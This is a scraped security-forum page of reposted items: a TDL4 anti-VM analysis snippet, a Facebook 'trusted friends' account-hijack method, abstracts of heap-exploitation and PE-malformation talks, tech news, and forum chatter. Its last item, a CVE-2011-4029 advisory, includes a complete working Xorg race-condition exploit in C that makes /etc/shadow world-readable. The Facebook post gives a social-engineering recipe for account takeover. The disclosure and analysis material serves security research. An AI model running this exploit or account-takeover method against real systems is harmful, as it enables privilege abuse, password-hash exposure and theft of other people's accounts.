    if (hr < 0) {
        std::cerr << "[-] ExecQuery() failed" << std::endl;
        return (-1);
    }
    CComPtr<IWbemClassObject> processor = NULL;
    ULONG retcnt;
    hr = enumerator->Next(WBEM_INFINITE, 1L,
                          reinterpret_cast<IWbemClassObject**>(&processor),
                          &retcnt);
    while (SUCCEEDED(hr) && retcnt > 0) {
        if (retcnt > 0) {
            _variant_t var_val;
            hr = processor->Get(L"Name", 0, &var_val, NULL, NULL);
            if (hr >= 0) {
                _bstr_t str = var_val;
                std::cout << "[+] Name: " << str << std::endl;
            } else {
                std::cerr << "[-] IWbemClassObject::Get failed" << std::endl;
                //result = -1;
            }
            hr = enumerator->Next(WBEM_INFINITE, 1L,
                                  reinterpret_cast<IWbemClassObject**>(&processor),
                                  &retcnt);
        } else {
            std::cout << "[-] Enumeration empty" << std::endl;
        }
    }
}

That's all for today :].

Source: w4kfu's bl0g
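Stripped of the COM plumbing, the loader's check boils down to case-insensitive substring matches over a few WMI fields. A hedged Python sketch of the same heuristic; looks_virtual is an illustrative name, and the input list stands in for rows returned by a query such as SELECT Model FROM Win32_DiskDrive:

```python
# Vendor strings TDL4 looks for in Win32_BIOS / Win32_DiskDrive /
# Win32_SCSIController results (taken from the decoded string table above).
VM_MARKERS = ("Xen", "QEMU", "Bochs", "Red Hat", "Citrix",
              "VMware", "Virtual HD", "VBOX")

def looks_virtual(wmi_values):
    """Return the first VM marker found in any queried WMI field, or None."""
    for value in wmi_values:
        for marker in VM_MARKERS:
            if marker.lower() in value.lower():
                return marker
    return None

print(looks_virtual(["VMware Virtual disk SCSI Disk Device"]))  # VMware
print(looks_virtual(["WDC WD10EZEX ATA Device"]))               # None
```

This also shows why the check is brittle: renaming the disk model string or patching the WMI results is enough to defeat it.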
  14. Facebook "Trusted Friends" Security Feature Easily Exploitable
POSTED BY THN REPORTER ON 10/31/2011 12:10:00 AM

Last week Facebook announced that in a single day as many as 600,000 accounts may be compromised. One possible solution from Facebook to combat security issues is to pick 3 to 5 "trusted friends". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked. In Facebook's case, the keys are codes, and the user can choose three to five "trusted friends" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to regain access.

Yet, in my opinion, hackers have been using this very method, with a little social engineering, to hijack Facebook accounts for the last 5-6 months. Let's see how it works...

How it's exploitable: this exploit is about 90% successful against victims who add friends without knowing them, or just to increase their friend count. The method only works if the 3 trusted friends agree to give you the security codes! Another idea: why not create 3 fake accounts and send friend requests to the victim? Once your 3 fake accounts are friends with your victim's Facebook account, you can select those 3 accounts to receive the security codes and reset the victim's password. A complete demonstration of the method is available on HackersOnlineClub.

Another serious Facebook vulnerability from last week: Nathan Power of SecurityPentest discovered a new Facebook vulnerability that makes it easy to attach EXE files to messages, potentially causing user credentials to be compromised.
It is not only account security: Facebook also has plenty of privacy issues. For example, Nelson Novaes Neto, an independent Brazilian security and behavior researcher, has analyzed a privacy issue in the Facebook Ticker that allows anyone to stalk you without your knowledge or consent. Facebook should take these privacy issues and security holes very seriously.

Demo: http://www.hackersonlineclub.com/hack-facebook-account

Source: Facebook "Trusted friends" Security Feature Easily Exploitable ~ THN : The Hacker News
  15. Understanding the Low Fragmentation Heap
Blackhat USA 2010
Chris Valasek
X-Force Researcher
cvalasek . gmail.com
@nudehaberdasher

Table of Contents
Introduction
  Overview
  Prior Works
  Prerequisites
  Terminology
  Notes
Data Structures
  _HEAP
  _HEAP_LIST_LOOKUP
  _LFH_HEAP
  _LFH_BLOCK_ZONE
  _HEAP_LOCAL_DATA
  _HEAP_LOCAL_SEGMENT_INFO
  _HEAP_SUBSEGMENT
  _HEAP_USERDATA_HEADER
  _INTERLOCK_SEQ
  _HEAP_ENTRY
  Overview
Architecture
  FreeLists
Algorithms
  Allocation
  Back-end Allocation
    RtlpAllocateHeap
    Overview
  Front-end Allocation
    RtlpLowFragHeapAllocFromContext
    Overview
    Example
  Freeing
  Back-end Freeing
    RtlpFreeHeap
    Overview
  Front-end Freeing
    RtlpLowFragHeapFree
    Overview
    Example
Security Mechanisms
  Heap Randomization
    Comments
  Header Encoding/Decoding
    Comments
  Death of bitmap flipping
  Safe Linking
    Comments
Tactics
  Heap Determinism
    Activating the LFH
    Defragmentation
    Adjacent Data
    Seeding Data
  Exploitation
    Ben Hawkes #1
    FreeEntryOffset Overwrite
  Observations
    SubSegment Overwrite
    Example
    Issues
Conclusion
Bibliography

Introduction

Over the years, Windows heap exploitation has continued to increase in difficulty due to the addition of exploitation countermeasures along with the implementation of more complex algorithms and data structures. Due to these trends and the scarcity of comprehensive heap knowledge within the community, reliable exploitation has severely declined. Maintaining a complete understanding of the inner workings of a heap manager can be the difference between unpredictable failure and precise exploitation.
The Low Fragmentation Heap has been the default front-end heap manager for the Windows operating system since the introduction of Windows Vista. This new front-end manager brought with it a different set of data structures and algorithms, replacing the Lookaside List. The way back-end memory management works has changed as well. All of this material must be reviewed to understand the repercussions of allocating and freeing memory within an application on Windows 7.

The main goal of this paper is to familiarize the reader with the newly created logic and data structures associated with the Low Fragmentation Heap. First, a clear and concise foundation will be provided by explaining the new data structures and their coupled purpose within the heap manager. Then detailed explanations concerning the underlying algorithms that manipulate those data structures will be discussed. Finally, some newly devised exploitation techniques will be unveiled, providing practical applications of this newfound knowledge.

Download: http://illmatics.com/Understanding_the_LFH.pdf
  16. Undocumented PECOFF

CONSTANT INSECURITY: THINGS YOU DIDN'T KNOW ABOUT (PE) PORTABLE EXECUTABLE FILE FORMAT

One constant challenge of modern security will always be the difference between published and implemented specifications. Evolving projects, by their very nature, open up a host of exploit areas and implementation ambiguities that cannot be fixed. As such, complex specifications such as PECOFF or PDF are goldmines of possibilities. In this talk we will disclose our recent findings about never-before-seen PE (Portable Executable) format malformations. These findings have serious consequences for security and reverse engineering tools and lead to multiple exploit vectors.

PE has been the main executable image file format on the Windows operating system since its introduction with Windows NT 18 years ago. The PE file format can be found on numerous Windows-based devices, including PCs, mobile and gaming devices, BIOS environments and others. Properly understanding it is key to securing these platforms.

The talk will focus on all aspects of PE file format parsing that lead to undesired behavior or prevent security and reverse engineering tools from inspecting malformed files due to incorrect parsing. Special attention will be given to differences between the PECOFF documentation and the actual implementation in the operating system loader. With respect to these differences, we will demonstrate the existence of files that cannot possibly be considered valid from a documentation standpoint but which are still correctly processed and loaded by the operating system. These differences and numerous design logic flaws can lead to PE processing errors that have serious and hardly detectable security implications. The effects of these PE file format malformations will be compared against several reverse engineering tools, security applications and unpacking systems.
Special attention will be given to the following PE file format aspects and the consequences of their malformation:
- General PE header layout with respect to data positioning, and the consequences of the different memory-model implementations specified by the PECOFF documentation.
- Use of multiple PE headers in a single file, along with self-destructing headers.
- Alignment fields and their impact on disk and memory layout, with the section layout issues that can occur due to disk or memory data overlapping or splicing. In addition, section table content will be inspected for data-hiding issues, and its limits will be tested for upper and lower content boundaries. We will demonstrate how such issues affect existing static and dynamic PE unpacking systems.
- Data tables, including imports and exports, will be discussed in detail to show how their malformed content can break analysis tools while still being considered valid from the operating system loader's standpoint.

We will demonstrate the existence of files that misuse existing PE features in order to cloak important file information and thwart the reverse engineering process. Furthermore, based on these methods, a unique, undetectable method of API hooking that requires no code for hook insertion will be presented. The PE file format will be inspected for integer overflows, and we will show how their presence can lead to arbitrary code execution in otherwise safe analysis environments. We will show how PE fields themselves can be used to deliver a code payload, resulting in a completely new field of programming: via the file format itself. In addition to single-field and single-table malformations, more complex ones involving multiple fields and tables will also be discussed. As a demonstration of such a use case, a unique malformation requiring multiple fields working together to establish custom file encryption will be presented.
This simple yet effective encryption, which is reversed at runtime by the operating system loader itself, requires no code in the malformed binary to be executed. Its effectiveness lies in a unique approach: encryption through file format features themselves, in order to prevent static and dynamic file analysis tools from processing such files.

This talk will be a Black Hat exclusive; the whitepaper accompanying the presentation materials will contain a detailed description of all malformations discussed during the talk. This whitepaper aims to be mandatory reading material for security analysts. It will continue to be maintained as new information on PE format malformations is discovered.

Slides: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Slides.pdf
Download whitepaper: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Whitepaper.pdf

Source: ReversingLabs vulnerability advisory | www.reversinglabs.com | Reverse Engineering & Software Protection
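Many of these malformations start from the fact that the PE header is located indirectly: the loader reads the e_lfanew dword at offset 0x3C of the DOS header and jumps to it, so the real header can sit almost anywhere in the file. A minimal sketch of that lookup over a synthetic buffer (offsets per the PECOFF specification; the blob is fabricated for illustration and is not a loadable image):

```python
import struct

def find_pe_header(data):
    """Follow e_lfanew the way the loader does: 'MZ' at offset 0, a dword
    at 0x3C, and the 'PE\\0\\0' signature at that offset. Returns the PE
    header offset, or None if any step fails."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return e_lfanew

# Fabricated image: DOS header padded out, PE signature planted at 0x80.
blob = bytearray(0x100)
blob[0:2] = b"MZ"
struct.pack_into("<I", blob, 0x3C, 0x80)
blob[0x80:0x84] = b"PE\x00\x00"
print(hex(find_pe_header(bytes(blob))))  # 0x80
```

Because e_lfanew is attacker-controlled, a file can point tools and the loader at different candidate headers, which is one root cause of the parser disagreements the talk exploits.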
  17. Nytro

    Nelamurire [Question]

    It's good that you posted this here. First of all, I don't see what reasons anyone would have for wanting to become a VIP. At the moment, the VIPs are the forum's older members, people we know and whose abilities we're aware of, people who have contributed a great deal. If there are VIPs without very many posts, they are people who have proven their qualities through various actions; they have shown us they are "special," and this is a simple way of rewarding them. Essentially, through VIP status we gather the members we are happy with. Granted, some order needs to be restored there, and I want to hand out another 2-3 VIP ranks, but I haven't really had time to follow the forum. There wouldn't be a huge number of advantages; we don't have logs or that kind of nonsense in the special category, but VIP members have a say in the changes made here. Beyond that, since we know each other, we can help each other out even without posting in the special category: when one of us needs something, someone willing to help is always found, and so on. To become a VIP you basically have to post. It doesn't matter what; that's up to you. Based on what you post, we get a sense of your knowledge and your way of thinking, and that's how the status is granted. And while we're at it, bring a bottle of whisky and we'll talk differently.
  18. Hackers wanted / Hackers are people too. A Discovery documentary about hacking. Skip crap like Hackers 95, where two losers frantically pound the keyboard, breeze through firewalls, and pull off who knows what other embarrassing stunts...
  19. I don't agree with information theft either (yeah, sure, Filelist passwords, how terribly interesting), but what he posted there is out of line. Oh well, that's a kind of advertising too; we'll end up with fans of account theft.
  20. Get yourself a grammar book and a book of English-language literature, and read it with a dictionary next to you. Then move on to the listening and speaking part; you need someone who knows English and knows how to pronounce things properly... You can also watch films in English without subtitles.
  21. The Kernel Panel at LinuxCon Europe Wednesday, 26 October 2011 14:31 Nathan Willis Linux users got a rare opportunity to hear directly from the hackers at the core of the Linux kernel on Wednesday at LinuxCon Europe. Read on for more on the state of ARM in the Linux kernel, the need for new kernel contributors, and the death of the Big Kernel Lock (BKL). Linus Torvalds and other kernel developers sat down for a question and answer session at the first LinuxCon Europe. Lennart Poettering, creator of PulseAudio and systemd, served as moderator for the panel, which consisted of Torvalds, Alan Cox, Thomas Gleixner, and Paul McKenney. The four took prepared questions from Poettering, as well as responding to impromptu audience member questions on every topic from version numbers to the future of the kernel project itself. The panelists introduced themselves first. Torvalds, of course, is the leader of the project. Cox works primarily in system-on-chip these days (although he has had other roles in the past). Gleixner maintains the real-time patches. McKenney works on the read-copy-update (RCU) mechanism. Together they account for just a tiny fraction of the kernel community, but by their roles and experience offer keen insights into the health of the kernel, the health of the kernel community, and the directions it is heading. Poettering opened by asking the group about a frequently-quoted comment by Torvalds that breaking userspace compatibility was something that had to be avoided at all costs. A nice sentiment, Poettering said, but one that sounds hypocritical considering how often the kernel team really does break compatibility with its releases — sometimes even with trivial changes like the switch from 2.6.x version numbers to 3.0 that happened earlier this year. 
Torvalds pointed out that any program which assumed that the kernel's version number would always start with a "2" was broken already, but that the kernel team had also added a "compatibility" mode that would report its version number as 2.6.40 if buggy programs needed it. That encapsulated the kernel team's approach: add something new, but do everything possible to make sure that the old way of doing things continued to work. Torvalds added that he used to keep ancient binaries around — including the very first shells written for Linux, which used APIs that were deprecated within months — to test against each new kernel release, just to make sure that old code continued to run. API stability is important, he said, but it flows out of not breaking the user experience. "No project is more important than the users of that project," he summarized. Next, Poettering asked if there was an aging problem with the core kernel development team, noting that the average age of the subsystem maintainers was growing. Torvalds said no, but that it sometimes seemed like it simply because it takes time for a new contributor to "graduate" from maintaining a single driver to managing a set, and eventually to managing an entire subsystem. The others agreed; Cox added that there was plenty of "fresh blood" in the project, in fact more than enough, but there was a bigger problem in the gender gap — a problem that no one seemed able to fix, despite years of trying. Most of the female kernel contributors today work for commercial vendors, he said, with very few participating out of their own hobbyist interest. Torvalds added that another reason it often seems like the kernel crowd is aging rapidly is how ridiculously young they were when they started — he was only 20 himself, and several other key contributors were still teenagers. 
Audience members asked questions from microphones placed at the edge of the stage, and several had questions about specific features: the Big Kernel Lock (BKL), the complexity of the ARM tree, and whether or not embedded Linux developers were given as much attention as developers working on desktop and server platforms. Cox reminisced about the BKL, which he called the right solution for the early days of multi-processor support in Linux, even though it had subsequently taken years to replace with more sophisticated methods. It was always a nuisance, he said, but it got Linux SMP support much faster than other OSes, such as the BSDs. The ARM architecture was controversial in recent months, after Torvalds had to resort to tough talk to get the ARM family to clean up its code and standardize more. The situation is much better today, Torvalds reported. The problem, he said, is that while ARM has a standardized instruction set for the processor, every ARM board has a different approach to other important things like timers and interrupts. Intel had never faced such a glut of incompatible standards for the x86 architecture because the PC platform was so uniform, so it has taken a while for ARM to see the need to take a more active approach towards standardization. Torvalds also said that for the most part the kernel team is very interested in embedded development; what gets tricky is that most embedded Linux devices are designed to be built once and never upgraded. That makes it harder to do testing and ongoing kernel support for embedded platforms. When asked about the challenges facing the Linux kernel over the next few years, McKenney cited a number of research topics facing all operating systems: scalability, real-time, and validation, to name a few. Torvalds said maintaining the right balance between complexity and the ability to get things done. 
The sheer amount of new hardware that comes out every year is overwhelming, he said; keeping up with it is a practical (though not theoretical) challenge for the team. Speaking of the practical, one audience member asked Torvalds what his process was when getting a new pull request from a contributor. "I manage by trusting people," he replied. Whenever a pull request comes in, he looks at the person who sent it. Depending on the person, his process varies: some people have earned enough trust over the years that he believes in their judgment, while others have their own recurring issues that mandate additional review. In any case, he said, he makes sure that the new code compiles on his own machine because he "hates it" when he can't compile for his own configuration. But for the most part, he said, his role is no longer to validate individual pieces of code, but to orchestrate the work of others. If he knows two people are working in a similar part of the kernel, he needs to be aware of it to avert clashes, but he trusts the maintainers of their individual subsections. That trust is given to the person, he reiterated; the individual earns it, not the company that the individual might work for. The panel touched on other areas as well, including security, cgroups, and subsystem bloat. In each case, what comes across in a panel discussion such as this is how human the process of writing and maintaining the kernel is. The kernel team can make mistakes, and they have to route around them with bugfixes in subsequent releases. Maintainers may not be interested in a particular area of development, but they will look at and even integrate the patches because they are important to a subset of developers or kernel users. The kernel may have steep technical challenges, but just as real a threat to productivity is burnout among maintainers. 
It is fun to watch the kernel team wisecrack and comment on stage, but it is also a healthy reminder that above all else, Linux is a collaborative project, not simply lines of code. Source: http://www.linux.com/learn/tutorials/499287:the-kernel-panel-at-linuxcon-europe
  22. Facebook Tests Security Features By Antone Gonsalves, CRN October 27, 2011 7:42 PM ET Facebook is testing security features that boost password protection for third-party applications and make it easier to reactivate accounts hijacked by hackers. Facebook unveiled App Passwords and Trusted Friends Wednesday, saying they would be testing the features over the “coming weeks.” The announcement is the latest effort by Facebook to improve safety on the site, which is a favorite target of cyber-criminals looking to dupe the social network’s 800 million users worldwide. Trusted Friends is like giving a bosom buddy the key to your house in case you get locked out. A user selects three to five friends that Facebook will send a secret code to pass along, if the account holder can’t get into the site. This sometimes happens when a hacker hijacks someone’s Facebook account and changes the password. App Passwords provides a higher level of security for logging in to third-party applications. A growing number of Web applications allow people to log in using their Facebook credentials. As an alternative, a unique password can be generated by going to Account Settings, then the Security tab and finally to the App Passwords section. Entering an e-mail address and the Facebook-generated password should get a person into the app. The password doesn’t have to be remembered, because Facebook can generate it anytime. Facebook announced the features the same day a security researcher reported a flaw that makes it possible to send a message on Facebook with an executable file attached. Such malware is often sent by cyber-criminals attempting to secretly gain control of people’s PCs. Nathan Power, director of a professional group called the Ohio Information Security Forum, discovered the workaround for Facebook’s security mechanism that prevents sending executables. Power reported the vulnerability to Facebook September 30, and said the vendor acknowledged the flaw Wednesday. 
Source: http://www.crn.com/news/security/231901834/facebook-tests-security-features.htm
  24. TDL4 botnet may be available for rent 27 October 2011 ESET's senior research fellow David Harley says that, while his team of researchers have been tracking the TDL4 botnet for some time, they have noticed a new phase in its evolution. These changes, he noted, may signal that either the team developing the malware has changed or that the developers have started selling a bootkit builder to other cybercriminal groups on a rental basis. The dropper for the botnet, he asserted, sends copious tracing information to the command-and-control server during the installation of the rootkit onto the system. In the event of any error, he said, it sends a comprehensive error message that gives the malware developers enough information to determine the cause of the fault. All of this, wrote Harley in his latest security posting, suggests that this bot is still under development. “We also found a form of countermeasure against bot trackers based on virtual machines: during the installation of the malware it checks on whether the dropper is being run in a virtual machine environment and this information is sent to the command-and-control server. Of course, malware that checks on whether it is running in a virtual environment is far from unusual in modern malware, but in this form it's kind of novel for TDL”, he said. One of the most interesting evolutions of the botnet, Infosecurity notes, is that the layout of the hidden file system has been changed also. In contrast to the previous version, which Harley said is capable of storing at most 15 files – regardless of the size of reserved space – the capacity of the new file system is limited by the length of the malicious partition. 
The file system presented by the latest modification of the malware is more advanced than previously, noted Harley, adding that, as an example, the malware is able to detect corruption of the files stored in the hidden file system by calculating its CRC32 checksum and comparing it with the value stored in the file header. In the event that a file is corrupted it is removed from the file system. Over at Avecto, Mark Austin, the Windows privilege management specialist, said that the removal of admin rights can add an extra layer of defence in the ongoing battle against the malware coders. “TDL-4 is a damaging piece of code that takes the competitor-removing aspects of darkware we saw with SpyEye – and its ability to detect and delete Zeus – and adds all manner of evasive technologies that make conventional pattern/heuristic analyses a lot more difficult”, he explained. The removal of admin rights, he went on to say, is a powerful option as part of a multi-layered IT security strategy in the constant battle against darkware in all its shapes and forms. “Even if you are unfortunate to find one or more user accounts have been compromised by a phishing attack, for example, the fact that the account(s) are limited in what they can do helps to reduce the effects of the security problem”, he added. Malware like this, said Austin, is almost certain to evolve, with cybercriminals repurposing elements of what is essentially a modular suite of malware, adding enhancements to certain features, deleting older code, and adding new elements to take advantage of newly-discovered attack vectors. “It isn't rocket science that will defeat new evolutions of existing malware – or for that matter completely new darkware code. What is needed is a carefully planned strategy, with well thought out implementations that use multiple elements of security which, when combined, are greater than the sum of their components”, he said. 
“Privileged account management can greatly assist IT professionals in this regard, as it adds an extra string to their defensive bow. This is all part of the GRC – governance, risk management and compliance – balancing act that is modern IT security management”, he added. Source: http://www.infosecurity-magazine.com/view/21651/tdl4-botnet-may-be-available-for-rent/
  24. Google Denies Requests To Remove Videos of Police Brutality By Jon Mitchell / October 27, 2011 4:45 PM In a show of good faith today, Google touted the fact that it has refused to cooperate with local law enforcement agencies in the U.S. who requested the removal of YouTube videos of police brutality and criticisms of law enforcement officials. Google cited its transparency report from the first half of this year, but to mention it today is telling. With violent crackdowns at Occupy Oakland this week, citizen media like YouTube have been a vital channel. From Google's mid-year transparency report: "We received a request from a local law enforcement agency to remove YouTube videos of police brutality, which we did not remove. Separately, we received requests from a different local law enforcement agency for removal of videos allegedly defaming law enforcement officials. We did not comply with those requests, which we have categorized in this Report as defamation requests." http://www.youtube.com/watch?feature=player_embedded&v=uRfjX7vHxM4 "The whole world is watching," as protesters around the country have reminded officials since they first began to occupy Wall Street. With this week's escalations, now would not be a good time for Google to engage in censorship. The wording of its notice about denying the removal requests is encouraging, but it's carefully chosen to suit a particular situation. Google complies with 93% of U.S. removal requests. It has decided that the best course of action is to maintain transparency and respond on a case-by-case basis. That transparency has upset governments, and the refusal to censor police brutality videos surely made some city officials unhappy. But Google's record is spotty. Just this month, it handed over a WikiLeaks volunteer's Gmail data to the U.S. government, which used an old and controversial law to request it without a warrant from a judge. 
Google is pushing for updated laws that better reflect the media of today, but in the meantime, its record on upholding free speech is touch-and-go. Google has done the right thing with these police takedown requests, but the world should keep watching. What do you think Google's responsibilities are regarding government requests? Source: Google Denies Requests To Remove Videos of Police Brutality [UPDATED]
  25. Xorg permission change vulnerability From: vladz <vladz () devzero fr>

Hi list,

A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch on 2011/10/18, and now I thought I could share the vulnerability description and its original PoC.

POC: http://vladz.devzero.fr/Xorg-CVE-2011-4029.txt

Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!)
Description: Xorg permission change vulnerability (CVE-2011-4029)
Product: X.Org (http://www.x.org/releases/)
Affected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USE_CHMOD preprocessor identifier
PoC tested on: Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13)

Follow-up:
2011/10/07 - X.org foundation informed
2011/10/09 - Distros informed
2011/10/18 - Issue/patch publicly announced

Introduction
------------

I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed, the local attacker needs to be able to run the X.Org X11 X server. 
NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" below for more information).

Description
-----------

Once started, Xorg attempts to create a lock file "/tmp/.Xn-lock" in a secure manner: it creates/opens a temporary lock file "/tmp/.tXn-lock" with the O_EXCL flag, writes the current PID into it, links it to the final "/tmp/.Xn-lock" and unlinks "/tmp/.tXn-lock". Here is the code:

$ cat -n os/utils.c
[...]
   288      /*
   289       * Create a temporary file containing our PID. Attempt three times
   290       * to create the file.
   291       */
   292      StillLocking = TRUE;
   293      i = 0;
   294      do {
   295          i++;
   296          lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644);
   297          if (lfd < 0)
   298              sleep(2);
   299          else
   300              break;
   301      } while (i < 3);
   302      if (lfd < 0) {
   303          unlink(tmp);
   304          i = 0;
   305          do {
   306              i++;
   307              lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644);
   308              if (lfd < 0)
   309                  sleep(2);
   310              else
   311                  break;
   312          } while (i < 3);
   313      }
   314      if (lfd < 0)
   315          FatalError("Could not create lock file in %s\n", tmp);
   316      (void) sprintf(pid_str, "%10ld\n", (long)getpid());
   317      (void) write(lfd, pid_str, 11);
   318      (void) chmod(tmp, 0444);
   319      (void) close(lfd);
   320
[...]
   328      haslock = (link(tmp,LockFile) == 0);
   329      if (haslock) {
   330          /*
   331           * We're done.
   332           */
   333          break;
   334      }
   335      else {
   336          /*
   337           * Read the pid from the existing file
   338           */
   339          lfd = open(LockFile, O_RDONLY);
   340          if (lfd < 0) {
   341              unlink(tmp);
   342              FatalError("Can't read lock file %s\n", LockFile);
   343          }
[...]

As a reminder, chmod() operates on filenames rather than on file handles. So in this case, at line 318, there is no guarantee that the file "/tmp/.tXn-lock" still refers to the same file on disk that it did when it was opened via the open() call. See the TOCTOU vulnerability explained on OWASP[1] for more information. The idea here is to remove and replace (by a malicious symbolic link) the "tmp" file ("/tmp/.tXn-lock") between the call to open() at line 296 and the call to chmod() at line 318. 
But for a non-root user, removing this file looks impossible, as it is located in a sticky-bit directory ("/tmp") and owned by root. But what if we launch two Xorg processes with an initial offset (a few milliseconds), so that the first process unlink()s (line 341) the "tmp" file right before the second process calls chmod()? This race condition would consist of placing unlink() between open() and chmod(). It sounds very difficult, because there is only one system call between them (and maybe not enough time to perform unlink() and create our symbolic link):

# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, " 2192\n", 11) = 11
chmod("/tmp/.tX1-lock", 0444) = 0

Anyway, we can make this possible by sending the signals SIGCONT and SIGSTOP[2] to our process. As they are not trapped by the program, they will allow us to control and regulate (by stopping and resuming) the execution flow. Here is how to proceed:

1) launch the X wrapper (pid=n)
2) stop it (by sending SIGSTOP to 'n') right after "/tmp/.tX1-lock" is created (this actually means that the next instruction is chmod())
3) launch another X process to unlink() /tmp/.tX1-lock
4) create the symbolic link "/tmp/.tX1-lock" -> "/etc/shadow"
5) send SIGCONT to 'n' to perform chmod() on our link

The minor problem is that when launching X several times (for race purposes), it makes the console switch between X and TTY, and in some cases it freezes the screen and disturbs the attack. The solution is to make X exit before it switches, by creating a link "/tmp/.Xn-lock" (the real lock filename) to a file that doesn't exist. This will make the open() call fail at line 339 and quit with FatalError() at line 342. 
So before our 5 steps, we just need to add:

0) create the symbolic link "/tmp/.X1-lock" -> "/dontexist"

Proof Of Concept
----------------

/* xchmod.c -- Xorg file permission change vulnerability PoC

   This PoC sets the rights 444 (read for all) on any file specified as
   argument (default file is "/etc/shadow"). Another good use for an
   attacker would be to dump an entire partition in order to disclose its
   full content later (via a "mount -o loop"). Made for EDUCATIONAL
   PURPOSES ONLY! CVE-2011-4029 has been assigned.

   In some configurations, this exploit must be launched from a TTY
   (switch by typing Ctrl-Alt-Fn). Tested on Debian 6.0.2 up to date with
   X default configuration issued from the xserver-xorg-core package
   (version 2:1.7.7-13).

   Compile: cc xchmod.c -o xchmod
   Usage:   ./xchmod [/path/to/file]   (default file is /etc/shadow)

     $ ls -l /etc/shadow
     -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
     $ ./xchmod
     [+] Trying to stop a Xorg process right before chmod()
     [+] Process ID 4134 stopped (SIGSTOP sent)
     [+] Removing /tmp/.tX1-lock by launching another Xorg process
     [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
     [+] Process ID 4134 resumed (SIGCONT sent)
     [+] Attack succeeded, ls -l /etc/shadow:
     -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow

   -----------------------------------------------------------------------
   "THE BEER-WARE LICENSE" (Revision 42): <vladz@devzero.fr> wrote this
   file. As long as you retain this notice you can do whatever you want
   with this stuff. If we meet some day, and you think this stuff is worth
   it, you can buy me a beer in return.  -V. 
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>

#define XORG_BIN "/usr/bin/X"
#define DISPLAY  ":1"

char *get_tty_number(void) {
  char tty_name[128], *ptr;

  memset(tty_name, '\0', sizeof(tty_name));
  readlink("/proc/self/fd/0", tty_name, sizeof(tty_name));
  if ((ptr = strstr(tty_name, "tty")))
    return ptr + 3;
  return NULL;
}

int launch_xorg_instance(void) {
  int child_pid;
  char *opt[] = { XORG_BIN, DISPLAY, NULL };

  if ((child_pid = fork()) == 0) {
    close(1); close(2);
    execve(XORG_BIN, opt, NULL);
    _exit(0);
  }
  return child_pid;
}

void show_target_file(char *file) {
  char cmd[128];

  memset(cmd, '\0', sizeof(cmd));
  sprintf(cmd, "/bin/ls -l %s", file);
  system(cmd);
}

int main(int argc, char **argv) {
  pid_t proc;
  struct stat st;
  int n, ret, current_attempt = 800;
  char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;

  if (argc < 2)
    strcpy(target_file, "/etc/shadow");
  else
    strcpy(target_file, argv[1]);

  sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
  sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);

  /* we must ensure that Xorg is not already running on this display */
  if (stat(lockfile, &st) == 0) {
    printf("[-] %s exists, maybe Xorg is already running on this"
           " display? Choose another display by editing the DISPLAY"
           " attributes.\n", lockfile);
    return 1;
  }

  /* this avoid execution to continue (and automatically switch to another
   * TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock
   * links does not exist. */
  symlink("/dontexist", lockfile);

  /* we have to force this mask to not comprise our later checks */
  umask(077);

  ttyno = get_tty_number();

  printf("[+] Trying to stop a Xorg process right before chmod()\n");

  while (--current_attempt) {
    proc = launch_xorg_instance();

    n = 0;
    while (n++ < 10000)
      if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
        break;

    if (ret == 0) {
      syscall(SYS_kill, proc, SIGSTOP);
      printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc);

      stat(lockfiletmp, &st);
      if ((st.st_mode & 4) == 0)
        break;

      printf("[-] %s file has wrong rights (%o)\n"
             "[+] removing it by launching another Xorg process\n",
             lockfiletmp, st.st_mode);
      launch_xorg_instance();
      sleep(7);
    }
    kill(proc, SIGKILL);
  }

  if (current_attempt == 0) {
    printf("[-] Attack failed.\n");
    if (!ttyno)
      printf("Try with console ownership: switch to a TTY* by using "
             "Ctrl-Alt-F[1-6] and try again.\n");
    return 1;
  }

  printf("[+] Removing %s by launching another Xorg process\n", lockfiletmp);
  launch_xorg_instance();
  sleep(7);

  if (stat(lockfiletmp, &st) == 0) {
    printf("[-] %s lock file still here... \n", lockfiletmp);
    return 1;
  }

  printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp, target_file);
  symlink(target_file, lockfiletmp);

  printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc);
  kill(proc, SIGCONT);

  /* wait for chmod() to finish */
  usleep(300000);

  stat(target_file, &st);
  if (!(st.st_mode & 004)) {
    printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode);
    return 1;
  }

  /* cleaning temporary link */
  unlink(lockfile);

  printf("[+] Attack succeeded, ls -l %s:\n", target_file);
  show_target_file(target_file);
  return 0;
}

Fix & Patch
------------

